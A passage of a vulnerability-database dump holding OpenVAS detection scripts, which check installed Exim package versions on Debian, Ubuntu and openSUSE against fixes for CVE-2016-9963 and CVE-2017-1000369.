Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703747\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-9963\");\n script_name(\"Debian Security Advisory DSA 3747-1 (exim4 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-25 00:00:00 +0100 (Sun, 25 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3747.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"exim4 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthis problem has been fixed in version 4.84.2-2+deb8u2.\n\nWe recommend that you upgrade your exim4 packages.\");\n script_tag(name:\"summary\", value:\"Bjoern Jacke discovered that Exim,\nDebian's default mail transfer agent, may leak the private DKIM signing key to\nthe log files if specific configuration options are met.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:26", "description": "Exim is prone to an information disclosure vulnerability.", "cvss3": {}, "published": "2016-12-23T00:00:00", "type": "openvas", "title": "Exim Information Disclosure Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2018-11-13T00:00:00", "id": "OPENVAS:1361412562310106485", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106485", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_exim_cve_2016_9963.nasl 12338 2018-11-13 14:51:17Z asteins $\n#\n# Exim Information Disclosure Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:exim:exim';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106485\");\n script_version(\"$Revision: 12338 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-13 15:51:17 +0100 (Tue, 13 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 10:52:32 +0700 (Fri, 23 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n\n script_cve_id(\"CVE-2016-9963\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Exim Information Disclosure Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SMTP problems\");\n script_dependencies(\"gb_exim_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n script_mandatory_keys(\"exim/installed\");\n\n script_tag(name:\"summary\", value:\"Exim is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"If several conditions are met, Exim leaks private information to a remote\nattacker.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker may obtain private information.\");\n\n script_tag(name:\"affected\", value:\"Exim 4.69 until 4.87.\");\n\n script_tag(name:\"solution\", value:\"Update to Exim 4.87.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://bugs.exim.org/show_bug.cgi?id=1996\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"4.69\", test_version2: \"4.87\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.87.1\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-01-06T00:00:00", "type": "openvas", "title": "Ubuntu Update for exim4 USN-3164-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843007", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843007", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for exim4 USN-3164-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843007\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-06 05:45:22 +0100 (Fri, 06 Jan 2017)\");\n script_cve_id(\"CVE-2016-9963\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for exim4 USN-3164-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Bjoern Jacke discovered that Exim incorrectly handled DKIM keys. In certain\nconfigurations, private DKIM signing keys could be leaked to the log files.\");\n script_tag(name:\"affected\", value:\"exim4 on Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3164-1\");\n script_xref(name:\"URL\", value:\"https://www.ubuntu.com/usn/USN-3164-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|16\\.10|12\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.82-3ubuntu2.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.82-3ubuntu2.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.87-3ubuntu1.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.87-3ubuntu1.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.76-3ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.76-3ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.86.2-2ubuntu2.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.86.2-2ubuntu2.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-31T18:28:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-06-20T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for exim (openSUSE-SU-2017:1625-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851569", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851569", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851569\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-20 17:22:14 +0200 (Tue, 20 Jun 2017)\");\n script_cve_id(\"CVE-2017-1000369\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for exim (openSUSE-SU-2017:1625-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for exim fixes the following issues:\n\n - CVE-2017-1000369: Fixed a memory leak in exim commandline handling,\n which could be used to exhaust memory and make 'stack crash' attacks\n likely. (boo#1044692)\");\n\n script_tag(name:\"affected\", value:\"exim on openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:1625-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~10.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.86.2~10.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~10.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~10.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.86.2~10.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~10.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-06-20T00:00:00", "type": "openvas", "title": "Ubuntu Update for exim4 USN-3322-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843214", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843214", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for exim4 USN-3322-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843214\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-06-20 07:00:25 +0200 (Tue, 20 Jun 2017)\");\n script_cve_id(\"CVE-2017-1000369\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for exim4 USN-3322-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that Exim did not properly\n deallocate memory when processing certain command line arguments. A local\n attacker could use this in conjunction with another vulnerability to possibly\n execute arbitrary code and gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"exim4 on Ubuntu 17.04,\n Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3322-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3322-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.82-3ubuntu2.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.82-3ubuntu2.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.88-5ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.88-5ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.87-3ubuntu1.2\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.87-3ubuntu1.2\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.86.2-2ubuntu2.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.86.2-2ubuntu2.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-01-29T20:07:21", "description": "Exim supports the use of multiple ", "cvss3": {}, "published": "2018-01-29T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for exim4 (DLA-1001-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891001", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891001", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891001\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-1000369\");\n script_name(\"Debian LTS: Security Advisory for exim4 (DLA-1001-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-29 00:00:00 +0100 (Mon, 29 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/06/msg00030.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"exim4 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n4.80-7+deb7u5.\n\nWe recommend that you upgrade your exim4 packages.\");\n\n script_tag(name:\"summary\", value:\"Exim supports the use of multiple '-p' command line arguments which are\nmalloc()'ed and never free()'ed, used in conjunction with other issues allows\nattackers to cause arbitrary code execution.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"exim4\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-24T12:57:47", "description": "The Qualys Research Labs discovered a memory leak in the Exim mail\ntransport agent. This is not a security vulnerability in Exim by itself,\nbut can be used to exploit a vulnerability in stack handling.", "cvss3": {}, "published": "2017-06-19T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3888-1 (exim4 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703888", "href": "http://plugins.openvas.org/nasl.php?oid=703888", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3888.nasl 6618 2017-07-07 14:17:52Z cfischer $\n# Auto-generated from advisory DSA 3888-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703888);\n script_version(\"$Revision: 6618 $\");\n script_cve_id(\"CVE-2017-1000369\");\n script_name(\"Debian Security Advisory DSA 3888-1 (exim4 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 16:17:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2017-06-19 00:00:00 +0200 (Mon, 19 Jun 2017)\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", 